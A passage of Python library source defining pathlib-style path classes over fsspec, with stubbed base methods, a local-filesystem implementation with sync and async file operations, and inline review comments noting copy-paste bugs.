for _ in range(1, levels): pattern += '/*'
if self.is_dir() and not pattern.startswith('*/'): pattern = '*/' + pattern
fiter = curdir.glob(pattern) if mode == 'shallow' else curdir.rglob(pattern)
fnames = [f for f in fiter if not bool(set(f.parts).intersection(ignore))]
if skip_dirs: return [f for f in fnames if f.is_file()]
if skip_files: return [f for f in fnames if f.is_dir()]
return list(fnames)
def ensure_dir(self: _P, mode: int = 0o777, parents: bool = True, exist_ok: bool = True):
"""Ensures the parent directory exists, creates if not"""
return self.absolute_parent.mkdir(mode=mode, parents=parents, exist_ok=exist_ok)
def _get_dest(self: _P, dest: base.PathLike, recursive: bool = False, overwrite: bool = False, skip_errors: bool = False):
"""
Validates the Destination
"""
_dest = self._new(dest)
if self.is_dir() and recursive: return _dest
if _dest.is_dir(): _dest = _dest.joinpath(self._filename_str)
if _dest.exists() and not overwrite:
if skip_errors: return _dest
raise ValueError(f'{_dest.as_posix()} exists and overwrite = False')
return _dest
@property
def absolute_parent(self) -> _P:
uri_scheme = self._uri_scheme
if uri_scheme: return self._new(self._PATH.join(f'{uri_scheme}://', '/'.join(self.parts[2:-1])))
p = self.resolve()
if p.is_dir(): return p
return p.parent
@property
def is_cloud(self) -> bool:
return bool(self._uri_scheme)
@property
def cloud_provider(self) -> Optional[str]:
return _PROVIDER_MAP.get(self._uri_scheme, None)
@property
def provider(self) -> Optional[str]:
return _PROVIDER_MAP.get(self._uri_scheme, 'Local')
@property
def bucket(self) -> Optional[str]:
    # NOTE(review): this redefines the working `bucket` property declared
    # earlier in this class body; later definitions win at class creation, so
    # the earlier implementation is dead code and cloud paths now raise here.
    # Confirm which version was intended.
    raise NotImplementedError
@property
def bucket_path(self) -> Optional[str]:
    # NOTE(review): also shadows an earlier implementation — same issue as
    # the `bucket` redefinition directly above.
    raise NotImplementedError
@property
def is_cloud(self) -> bool:
    # Duplicate of the identical `is_cloud` defined earlier; redundant but harmless.
    return bool(self._uri_scheme)
@property
def is_gs(self) -> bool:
return bool(self._uri_scheme == 'gs')
@property
def is_s3(self) -> bool:
return bool(self._uri_scheme == 's3')
@property
def is_minio(self) -> bool:
return bool(self._uri_scheme == 'minio')
def exists(self) -> bool:
"""
Returns True if self exists.
"""
raise NotImplementedError
def is_dir(self) -> bool:
"""
Returns True if self is a directory.
"""
raise NotImplementedError
def is_file(self) -> bool:
"""
Returns True if self is a file.
"""
raise NotImplementedError
def cat(self: _P, recursive: bool = False, on_error: Optional[str] = None, **kwargs):
"""
Fetch (potentially multiple) paths contents
"""
raise NotImplementedError
def cat_file(self: _P, start: Optional[int] = None, end: Optional[int] = None, **kwargs):
"""
Get the content of a file
"""
raise NotImplementedError
def copy(self: _P, dest: base.PathLike, overwrite: bool = False, skip_errors: bool = False) -> _P:
"""
Copies the File to the Dir/File.
"""
raise NotImplementedError
def download(self: _P, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, **kwargs):
"""
Copy file(s) to local.
"""
raise NotImplementedError
def du(self: _P, total: Optional[int] = None, maxdepth: Optional[int] = None, **kwargs):
"""
Fetch (potentially multiple) paths contents
"""
raise NotImplementedError
def find(self: _P, maxdepth: Optional[int] = None, withdirs: bool = False, detail: bool = False, prefix: Optional[str] = None, **kwargs):
"""
List all files below path.
"""
raise NotImplementedError
def get_checksum(self: _P, refresh: bool = False, **kwargs):
"""
Unique value for current version of file
"""
raise NotImplementedError
def get_file(self: _P, dest: base.PathLike, callback: Optional[Callable] = None, **kwargs):
"""
Copy single remote file to local
"""
raise NotImplementedError
def get_files(self: _P, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, **kwargs):
"""
Copy file(s) to local.
"""
raise NotImplementedError
def glob(self: _P, pattern: str) -> Iterator[_P]:
"""
Yielding all matching files (of any kind).
"""
raise NotImplementedError
def head(self: _P, size: Optional[int] = None):
"""
Get the first size bytes from file
"""
raise NotImplementedError
def iterdir(self: _P) -> Iterator[_P]:
"""
Iterates over the directory.
"""
raise NotImplementedError
def get_modified(self: _P, version_id: str = None, refresh: bool = False, **kwargs):
"""
Return the last modified timestamp of file at path as a datetime
"""
raise NotImplementedError
def ls(self: _P, detail: bool = False, **kwargs):
"""
List objects at path.
"""
raise NotImplementedError
def mkdir(self: _P, mode: int = 0o777, parents: bool = False, exist_ok: bool = False) -> None:
"""
Create a new directory at this given path.
"""
raise NotImplementedError
def move(self: _P, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Move file(s) from one location to another
"""
raise NotImplementedError
def mv(self: _P, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Move file(s) from one location to another
"""
raise NotImplementedError
def open(self: _P, mode: str = 'r', encoding: Optional[str] = base.DEFAULT_ENCODING, errors: Optional[str] = None, **kwargs: Any) -> typing.IO[Union[str, bytes]]:
"""Opens the file."""
raise NotImplementedError
def put_file(self: _P, dest: base.PathLike, callback: Optional[Callable] = None, **kwargs):
"""
Copy file from local.
"""
raise NotImplementedError
def put_files(self: _P, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, **kwargs):
"""
Copy file(s) from local.
"""
raise NotImplementedError
def remove(self: _P, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
raise NotImplementedError
def rename(self: _P, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Rename file or directory to the given target.
"""
raise NotImplementedError
def replace(self: _P, target: base.PathLike) -> _P:
"""
Replace file or directory to the given target.
"""
raise NotImplementedError
def rm(self: _P, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
raise NotImplementedError
def rm_file(self: _P, missing_ok: bool = True, **kwargs):
"""
Delete a file
"""
raise NotImplementedError
def rmdir(self: _P, force: bool = False) -> None:
"""
Remove the empty directory.
"""
raise NotImplementedError
def rmtree(self: _P) -> None:
"""
Remove the directory.
"""
raise NotImplementedError
def sign(self: _P, expiration: int = 100, **kwargs):
"""
Create a signed URL representing the given path
Some implementations allow temporary URLs to be generated, as a way of delegating credentials
"""
raise NotImplementedError
def split_path(self: _P, **kwargs) -> List[str]:
"""
Normalise path string into bucket and key
"""
raise NotImplementedError
def tail(self: _P, size: Optional[int] = None):
"""
Get the last size bytes from file
"""
raise NotImplementedError
def touch(self: _P, truncate: bool = True, data = None, **kwargs):
"""
Create empty file or truncate
"""
raise NotImplementedError
def unlink(self: _P, missing_ok: bool = True) -> None:
"""
Remove this file or symbolic link.
"""
raise NotImplementedError
def url(self: _P, expires: int = 3600, client_method: str = 'get_object', **kwargs):
"""
Generate presigned URL to access path by HTTP
"""
raise NotImplementedError
def upload(self: _P, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, **kwargs):
"""
Copy file(s) from local.
"""
raise NotImplementedError
@property
def checksum(self):
"""
Unique value for current version of file without refreshing
"""
return self.get_checksum()
@property
def created(self):
    """
    Return the created timestamp of a file as a datetime
    """
    # NOTE(review): this returns get_checksum(), not a creation timestamp —
    # looks like a copy/paste slip from the `checksum` property above it.
    # Confirm intended behavior before relying on this value.
    return self.get_checksum()
@property
def exist(self) -> bool:
"""
Returns True if self exists.
"""
return self.exists()
@property
def info(self):
"""
Give details of entry at path
"""
raise NotImplementedError
@property
def isdir(self) -> bool:
"""
Returns True if self is a directory.
"""
return self.is_dir()
@property
def isfile(self) -> bool:
"""
Returns True if self is a file.
"""
return self.is_file()
@property
def modified(self):
"""
Return the last modified timestamp of file at path as a datetime without refreshing
"""
return self.get_modified()
@property
def size(self: _P):
"""
Size in bytes of file
"""
raise NotImplementedError
@property
def stat(self: _P):
"""
Give details of entry at path
"""
raise NotImplementedError
@property
def home(self):
    """
    Returns the home directory: the bucket root for cloud paths, otherwise
    the expanded local user home.
    """
    if self.is_cloud:
        return self._new(self.get_bucket(True))
    return self._new(os.path.expanduser('~'))
@property
def userdir(self):
    """Alias for :attr:`home`."""
    return self.home
import upath
from fsspec.asyn import AsyncFileSystem
from fsspec.implementations.local import LocalFileSystem
class AsyncFSx(AsyncFileSystem, LocalFileSystem):
    """Local filesystem combined with fsspec's async interface; used when
    PosixFSxPath is asked for an asynchronous filesystem instance."""
    pass
class PosixFSxPath(_IOPath, pathlib.PurePosixPath):
"""
Pathlib-like API around `fsspec` providing Async Capabilities
"""
_PATH = posixpath
_FSX: 'LocalFileSystem' = None
_SYNC_FS: 'LocalFileSystem' = None
_ASYNC_FS: 'LocalFileSystem' = None
_FSX_LIB: str = 'fsspec'
_FSX_MODULE: Optional[str] = 'fsspec.implementations.local'
_FSX_CLS: str = 'LocalFileSystem'
@classmethod
def _get_filesystem(cls, is_async: bool = False, *args, **kwargs):
cls._ensure_lib()
if is_async and cls._ASYNC_FS: return cls._ASYNC_FS
if cls._SYNC_FS: return cls._SYNC_FS
# remove this since we will have it be for sure available.
#from fsspec.implementations.local import LocalFileSystem
if is_async:
cls._ASYNC_FS = AsyncFSx(asynchronous = True)
return cls._ASYNC_FS
cls._SYNC_FS = LocalFileSystem()
return cls._SYNC_FS
@property
def async_fs(self) -> 'AsyncFSx':
if not self._ASYNC_FS: self._get_filesystem(is_async=True)
return self._ASYNC_FS
@property
def sync_fs(self) -> 'LocalFileSystem':
if not self._SYNC_FS: self._get_filesystem()
return self._SYNC_FS
@classmethod
def get_configz(cls, *args, **kwargs):
return {}
def exists(self) -> bool:
"""
Returns True if self exists.
"""
return self.sync_fs.exists(self._cpath_str)
def expand_path(self, recursive: bool = False, maxdepth: Optional[int] = None):
    """
    Turn one or more globs or directories into a list of all matching paths
    to files or directories.

    Bug fix: the original never passed the path itself to `fs.expand_path`,
    so the call could not work; the path string is now supplied as the
    first argument.
    """
    paths = self.sync_fs.expand_path(self._cpath_str, recursive=recursive, maxdepth=maxdepth)
    return [self._new(p) for p in paths]
def is_dir(self) -> bool:
"""
Returns True if self is a directory.
"""
return self.sync_fs.isdir(self._cpath_str)
def is_file(self) -> bool:
"""Returns True if self is a file."""
return self.sync_fs.isfile(self._cpath_str)
def cat(self, recursive: bool = False, on_error: Optional[str] = None, **kwargs):
"""
Fetch (potentially multiple) paths contents
"""
return self.sync_fs.cat(self._cpath_str, recursive, on_error, **kwargs)
def cat_file(self, start: Optional[int] = None, end: Optional[int] = None, **kwargs):
"""
Get the content of a file
"""
return self.sync_fs.cat_file(self._cpath_str, start=start, end=end, **kwargs)
def copy(self, dest: base.PathLike, recursive: bool = False, overwrite: bool = False, skip_errors: bool = False) -> _P:
"""
Copies the File to the Dir/File.
"""
_dest = self._get_dest(dest, recursive, overwrite, skip_errors)
self.sync_fs.copy(self._cpath_str, _dest._cpath_str, recursive = recursive)
return _dest
def download(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) to local.
"""
_dest = self._get_dest(dest, recursive, overwrite, skip_errors)
self.sync_fs.download(self._cpath_str, _dest._cpath_str, recursive = recursive, callback = callback)
return _dest
def du(self, total: Optional[int] = None, maxdepth: Optional[int] = None, **kwargs):
"""
Fetch (potentially multiple) paths contents
"""
return self.sync_fs.du(self._cpath_str, total, maxdepth, **kwargs)
def find(self, path: Optional[str] = None, maxdepth: Optional[int] = None, withdirs: bool = False, detail: bool = False, prefix: Optional[str] = None, **kwargs):
"""
List all files below path.
"""
p = self if not path else self.joinpath(path)
return self.sync_fs.find(p, maxdepth=maxdepth, withdirs=withdirs, detail=detail, prefix=prefix, **kwargs)
def get_checksum(self, refresh: bool = False, **kwargs):
"""
Unique value for current version of file
"""
return self.sync_fs.checksum(self._cpath_str, refresh=refresh, **kwargs)
def get_file(self, dest: base.PathLike, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy single remote file to local
"""
_dest = self._get_dest(dest, overwrite=overwrite, skip_errors=skip_errors)
return self.sync_fs.get_file(self._cpath_str, _dest._cpath_str, callback=callback, **kwargs)
def get_files(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) to local.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
return self.sync_fs.get(self._cpath_str, _dest._cpath_str, recursive=recursive, callback=callback, **kwargs)
def glob(self, pattern: str, **kwargs) -> Iterator[_P]:
    """
    Yield all matching files (of any kind) for *pattern* relative to this path.

    Bug fix: the original called `._cpath_str` on the plain string returned
    by `posixpath.join`, which raised AttributeError on every call. Build a
    proper path object first, then strip the scheme for the filesystem call.
    """
    uri_scheme = self._uri_scheme
    search = self._new(self._PATH.join(self._path_str, pattern))
    for match in self.sync_fs.glob(search._cpath_str, **kwargs):
        # re-attach the cloud scheme that _cpath_str stripped
        if self.is_cloud:
            yield self._new(f'{uri_scheme}://' + match)
        else:
            yield self._new(match)
def head(self, size: Optional[int] = None):
"""
Get the first size bytes from file
"""
return self.sync_fs.head(self._cpath_str, size)
def iterdir(self, **kwargs) -> Iterator[_P]:
"""
Iterates over the directory.
"""
uri_scheme = self._uri_scheme
for f in self.sync_fs.glob(self._cpath_str, **kwargs):
if self.is_cloud: yield self._new(f'{uri_scheme}://' + f)
else: yield self._new(f)
def get_modified(self, version_id: str = None, refresh: bool = False, **kwargs):
"""
Return the last modified timestamp of file at path as a datetime
"""
return self.sync_fs.modified(self._cpath_str, version_id=version_id, refresh=refresh, **kwargs)
## return self.sync_fs.modified(self._cpath_str,
def ls(self, detail: bool = False, **kwargs):
"""
List objects at path.
"""
return self.sync_fs.ls(self._cpath_str, detail=detail, **kwargs)
def mkdir(self, mode: int = 0o777, parents: bool = False, exist_ok: bool = False) -> None:
"""
Create a new directory at this given path.
"""
## Will return if exist_ok first, otherwise will fail check
if self.exists() and exist_ok: return
return self.sync_fs.mkdir(self._cpath_str, mode=mode, create_parents=parents, exist_ok=exist_ok)
def move(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Move file(s) from one location to another
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.sync_fs.move(self._cpath_str, _dest._cpath_str, recursive = recursive, maxdepth=maxdepth)
return _dest
def mv(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Move file(s) from one location to another
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.sync_fs.move(self._cpath_str, _dest._cpath_str, recursive = recursive, maxdepth=maxdepth)
return _dest
def open(self, mode: str = 'r', encoding: Optional[str] = base.DEFAULT_ENCODING, errors: Optional[str] = None, block_size: int = 5242880, compression: str = 'infer', **kwargs: Any) -> typing.IO[Union[str, bytes]]:
"""Opens the file."""
filelike = self.sync_fs.open(self._cpath_str, mode=mode, encoding=encoding, errors=errors, block_size=block_size, compression=compression, **kwargs)
filelike = typing.cast(typing.IO[Union[str, bytes]], filelike)
return filelike
def put_file(self, dest: base.PathLike, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file from local.
"""
_dest = self._get_dest(dest, overwrite=overwrite, skip_errors=skip_errors)
self.sync_fs.put_file(self._cpath_str, _dest._cpath_str, callback = callback, **kwargs)
return _dest
def put_files(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) from local.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.sync_fs.put(self._cpath_str, _dest._cpath_str, recursive=recursive, callback = callback, **kwargs)
return _dest
def remove(self, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
return self.sync_fs.rm(self._cpath_str, recursive=recursive, maxdepth = maxdepth, **kwargs)
def rename(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Rename file or directory to the given target.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.sync_fs.rename(self._cpath_str, _dest._cpath_str, recursive=recursive, maxdepth = maxdepth, **kwargs)
return _dest
def replace(self, target: base.PathLike) -> _P:
    """
    Replace file or directory with the given target.

    Returns the destination path object.
    """
    _dest = self._get_dest(target, overwrite=True)
    self.sync_fs.rename(self._cpath_str, _dest._cpath_str)
    # BUG FIX: the method is annotated `-> _P` but previously fell off the
    # end and returned None; callers chaining on the result would break.
    return _dest
def rm(self, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
self.sync_fs.rm(self._cpath_str, recursive, maxdepth, **kwargs)
def rm_file(self, missing_ok: bool = True, **kwargs):
"""
Delete a file
"""
if not self.exists():
if missing_ok: return
raise ValueError(f"{self._path_str} does not exist")
self.sync_fs.rm_file(self._cpath_str, **kwargs)
def rmdir(self, force: bool = False, recursive: bool = True, skip_errors: bool = True) -> None:
"""
Remove the empty directory.
If force, will recursively remove even if not empty.
"""
try:
return self.sync_fs.rmdir(self._cpath_str)
except Exception as e:
if force: return self.sync_fs.rm(self._cpath_str, recursive = recursive)
if skip_errors: return
raise e
def rmtree(self, recursive: bool = True, maxdepth: Optional[int] = None) -> None:
"""Remove the directory."""
return self.sync_fs.rm(self._cpath_str, recursive, maxdepth)
def sign(self, expiration: int = 100, **kwargs):
"""
Create a signed URL representing the given path
Some implementations allow temporary URLs to be generated, as a way of delegating credentials
"""
return self.sync_fs.sign(self._cpath_str, expiration, **kwargs)
def split_path(self, **kwargs) -> List[str]:
"""
Normalise path string into bucket and key
"""
return self.sync_fs.split_path(self._cpath_str, **kwargs)
def tail(self, size: Optional[int] = None):
"""
Get the last size bytes from file
"""
return self.sync_fs.tail(self._cpath_str, size)
def touch(self, truncate: bool = True, data = None, **kwargs):
"""
Create empty file or truncate
"""
return self.sync_fs.touch(self._cpath_str, truncate = truncate, data = data, **kwargs)
def unlink(self, missing_ok: bool = True, **kwargs) -> None:
"""
Remove this file or symbolic link.
"""
if getattr(self.sync_fs, 'unlink', None): return self.sync_fs.unlink(self._cpath_str, missing_ok = missing_ok, **kwargs)
return self.rm_file(missing_ok, **kwargs)
def url(self, expires: int = 3600, client_method: str = 'get_object', **kwargs):
"""
Generate presigned URL to access path by HTTP
"""
return self.sync_fs.url(self._cpath_str, expires, client_method, **kwargs)
def upload(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
    """
    Copy file(s) from local to `dest`.

    Returns the destination path object's filesystem result.
    """
    _dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
    # BUG FIX: this previously called `sync_fs.url(...)` (copy-paste from
    # `url`), which generates a presigned URL instead of uploading anything.
    # `upload` is fsspec's alias for `put`.
    return self.sync_fs.upload(self._cpath_str, _dest._cpath_str, recursive=recursive, callback=callback, **kwargs)
def get_bucket(self, prefix: bool = True) -> Optional[str]:
"""
Returns the root bucket with optional prefix
"""
if not self.is_cloud: return None
parts = self.split_path()
uri_scheme = self._uri_scheme
if prefix: return f'{uri_scheme}://' + parts[0]
return parts[0]
def get_bucket_path(self, prefix: bool = True) -> Optional[str]:
"""
Returns the root bucket + path with optional prefix
removes the versioning
"""
if not self.is_cloud: return None
parts = self.split_path()
uri_scheme = self._uri_scheme
p = '/'.join(parts[:2])
if prefix: return f'{uri_scheme}://' + p
return p
def resolve(self, strict: bool = False):
"""
Returns the abolute path.
"""
if self.is_cloud: return self._new(self.as_posix())
return self._new(self._PATH.abspath(self._path_str))
@property
def bucket(self) -> Optional[str]:
if not self.is_cloud: return None
parts = self.split_path()
return parts[0]
@property
def bucket_path(self) -> Optional[str]:
if not self.is_cloud: return None
parts = self.split_path()
return parts[1]
@property
def _path_str(self) -> str:
"""
Returns the `__fspath__` string representation.
"""
uri_scheme = self._uri_scheme
if uri_scheme: return self._PATH.join(f'{uri_scheme}://', *self.parts[2:])
else: return self._PATH.join(*self.parts) if self.parts else '.'
@property
def string(self) -> str:
    """
    Returns the `__fspath__` string representation (alias of `_path_str`).
    """
    return self._path_str
@property
def _filename_str(self) -> str:
"""
Returns the filename if is file, else ''
"""
if self.is_file(): return self.parts[-1]
return ''
@property
def extension(self) -> str:
"""
Returns the extension for a file
"""
return self.suffix
@property
def _cpath_str(self) -> str:
"""
Returns the `__fspath__` string representation without the uri_scheme
"""
uri_scheme = self._uri_scheme
if uri_scheme: return self._PATH.join(*self.parts[2:])
else: return self._PATH.join(*self.parts) if self.parts else '.'
@property
def checksum(self):
"""
Unique value for current version of file without refreshing
"""
return self.get_checksum()
@property
def created(self):
    """
    Return the created timestamp of a file as a datetime.
    """
    # BUG FIX: this previously returned `self.get_checksum()` (copy-paste
    # from the `checksum` property above). Delegate to the filesystem's
    # creation-time accessor instead, mirroring how `size`/`stat` delegate.
    return self.sync_fs.created(self._cpath_str)
@property
def exist(self) -> bool:
"""
Returns True if self exists.
"""
return self.exists()
@property
def info(self):
"""
Give details of entry at path
"""
return self.sync_fs.info(self._cpath_str)
@property
def isdir(self) -> bool:
"""
Returns True if self is a directory.
"""
return self.is_dir()
@property
def isfile(self) -> bool:
"""
Returns True if self is a file.
"""
return self.is_file()
@property
def modified(self):
"""
Return the last modified timestamp of file at path as a datetime without refreshing
"""
return self.get_modified()
@property
def size(self):
"""
Size in bytes of file
"""
return self.sync_fs.size(self._cpath_str)
@property
def stat(self):
"""
Give details of entry at path
"""
return self.sync_fs.stat(self._cpath_str)
@property
def home(self) -> Optional[str]:
"""
Returns the home directory/bucket
"""
if self.is_cloud: return self._new(self.get_bucket(True))
p = os.path.expanduser('~')
return self._new(p)
###############################################################
#### Async Versions of the Sync Functions ###
###############################################################
def _get_afs_attr(self, name: str, default: Optional[Callable] = None):
return getattr(self.async_fs, f'_{name}', getattr(self.async_fs, name, default))
async def async_info(self):
"""
Give details of entry at path
"""
try: return await self._get_afs_attr('info')(self._cpath_str)
except: return self.sync_fs.info(self._cpath_str)
#return await self.async_fs._info(self._cpath_str)
async def async_exists(self) -> bool:
"""
Returns True if self exists.
"""
try: return await self._get_afs_attr('exists')(self._cpath_str)
except: return self.sync_fs.exists(self._cpath_str)
#return await self.async_fs._exists(self._cpath_str)
async def async_is_dir(self) -> bool:
    """
    Returns True if self is a directory.
    """
    # BUG FIX: this previously queried 'info' (copy-paste from async_info)
    # and so returned an info dict rather than the annotated boolean.
    try: return await self._get_afs_attr('isdir')(self._cpath_str)
    except Exception: return self.sync_fs.isdir(self._cpath_str)
async def async_is_file(self) -> bool:
"""Returns True if self is a file."""
try: return await self._get_afs_attr('isfile')(self._cpath_str)
except: return self.sync_fs.isfile(self._cpath_str)
# return await self.async_fs._isfile(self._cpath_str)
async def async_cat(self, recursive: bool = False, on_error: Optional[str] = None, **kwargs):
    """
    Fetch (potentially multiple) paths' contents.
    """
    # BUG FIX: the async accessor's result was returned without `await`, so
    # callers received a coroutine object (and failures could never reach
    # the fallback branch). Await it so errors surface here.
    try: return await self._get_afs_attr('cat')(self._cpath_str, recursive, on_error, **kwargs)
    except Exception: return self.sync_fs.cat(self._cpath_str, recursive, on_error, **kwargs)
async def async_cat_file(self, start: Optional[int] = None, end: Optional[int] = None, **kwargs):
"""
Get the content of a file
"""
return await self.async_fs._cat_file(self._cpath_str, start=start, end=end, **kwargs)
async def async_copy(self, dest: base.PathLike, recursive: bool = False, overwrite: bool = False, skip_errors: bool = False) -> _P:
"""
Copies the File to the Dir/File.
"""
_dest = self._get_dest(dest, recursive, overwrite, skip_errors)
await self.async_fs._copy(self._cpath_str, _dest._cpath_str, recursive = recursive)
return _dest
async def async_download(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) to local.
"""
_dest = self._get_dest(dest, recursive, overwrite, skip_errors)
await self.async_fs._download(self._cpath_str, _dest._cpath_str, recursive = recursive, callback = callback)
return _dest
async def async_du(self, total: Optional[int] = None, maxdepth: Optional[int] = None, **kwargs):
"""
Fetch (potentially multiple) paths contents
"""
return await self.async_fs._du(self._cpath_str, total, maxdepth, **kwargs)
async def async_expand_path(self, recursive: bool = False, maxdepth: Optional[int] = None):
"""
Turn one or more globs or directories into a list of all matching paths to files or directories.
"""
paths = await self.async_fs._expand_path(recursive = recursive, maxdepth = maxdepth)
return [self._new(p) for p in paths]
async def async_find(self, path: Optional[str] = None, maxdepth: Optional[int] = None, withdirs: bool = False, detail: bool = False, prefix: Optional[str] = None, **kwargs):
"""
List all files below path.
"""
p = self if not path else self.joinpath(path)
return await self.async_fs._find(p, maxdepth=maxdepth, withdirs=withdirs, detail=detail, prefix=prefix, **kwargs)
async def async_get_checksum(self, refresh: bool = False, **kwargs):
"""
Unique value for current version of file
"""
return await self.async_fs.checksum(self._cpath_str, **kwargs)
#return self.async_fs.checksum(self._cpath_str, refresh=refresh, **kwargs)
async def async_get_file(self, dest: base.PathLike, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy single remote file to local
"""
_dest = self._get_dest(dest, overwrite=overwrite, skip_errors=skip_errors)
return await self.async_fs._get_file(self._cpath_str, _dest._cpath_str, callback=callback, **kwargs)
async def async_get_files(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) to local.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
return await self.async_fs._get(self._cpath_str, _dest._cpath_str, recursive=recursive, callback=callback, **kwargs)
async def async_glob(self, pattern: str, **kwargs) -> Iterator[_P]:
    """
    Yield all matching files (of any kind) for `pattern` under this path.
    """
    uri_scheme = self._uri_scheme
    # BUG FIX: the original accessed `._cpath_str` on the plain string
    # returned by `_PATH.join(...)` (str has no such attribute), raising
    # AttributeError on every call. Join the scheme-less path directly.
    for f in await self.async_fs._glob(self._PATH.join(self._cpath_str, pattern), **kwargs):
        if self.is_cloud: yield self._new(f'{uri_scheme}://' + f)
        else: yield self._new(f)
async def async_head(self, size: Optional[int] = None):
"""
Get the first size bytes from file
"""
return self.async_fs.head(self._cpath_str, size)
async def async_iterdir(self, **kwargs) -> Iterator[_P]:
"""
Iterates over the directory.
"""
uri_scheme = self._uri_scheme
for f in await self.async_fs._glob(self._cpath_str, **kwargs):
if self.is_cloud: yield self._new(f'{uri_scheme}://' + f)
else: yield self._new(f)
async def async_get_modified(self, version_id: str = None, refresh: bool = False, **kwargs):
"""
Return the last modified timestamp of file at path as a datetime
"""
return self.async_fs.modified(self._cpath_str, version_id=version_id, refresh=refresh, **kwargs)
async def async_ls(self, detail: bool = False, **kwargs):
"""
List objects at path.
"""
return await self.async_fs._ls(self._cpath_str, detail=detail, **kwargs)
async def async_mkdir(self, mode: int = 0o777, parents: bool = False, exist_ok: bool = False) -> None:
"""
Create a new directory at this given path.
"""
if self.exists() and exist_ok: return
return await self.async_fs._mkdir(self._cpath_str, mode=mode, create_parents=parents, exist_ok=exist_ok)
async def async_move(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Move file(s) from one location to another
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.async_fs.move(self._cpath_str, _dest._cpath_str, recursive = recursive, maxdepth=maxdepth)
return _dest
async def async_mv(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Move file(s) from one location to another
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.async_fs.move(self._cpath_str, _dest._cpath_str, recursive = recursive, maxdepth=maxdepth)
return _dest
async def async_open(self, mode: str = 'r', encoding: Optional[str] = base.DEFAULT_ENCODING, errors: Optional[str] = None, block_size: int = 5242880, compression: str = 'infer', **kwargs: Any) -> typing.IO[Union[str, bytes]]:
"""Opens the file."""
filelike = await self.async_fs._open(self._cpath_str, mode=mode, encoding=encoding, errors=errors, block_size=block_size, compression=compression, **kwargs)
filelike = typing.cast(typing.IO[Union[str, bytes]], filelike)
return filelike
async def async_put_file(self, dest: base.PathLike, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file from local.
"""
_dest = self._get_dest(dest, overwrite=overwrite, skip_errors=skip_errors)
await self.async_fs._put_file(self._cpath_str, _dest._cpath_str, callback = callback, **kwargs)
return _dest
async def async_put_files(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) from local.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
await self.async_fs._put(self._cpath_str, _dest._cpath_str, recursive=recursive, callback = callback, **kwargs)
return _dest
async def async_remove(self, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
return await self.async_fs._rm(self._cpath_str, recursive=recursive, maxdepth = maxdepth, **kwargs)
async def async_rename(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Rename file or directory to the given target.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.async_fs.rename(self._cpath_str, _dest._cpath_str, recursive=recursive, maxdepth = maxdepth, **kwargs)
return _dest
async def async_replace(self, target: base.PathLike) -> _P:
    """
    Replace file or directory with the given target.

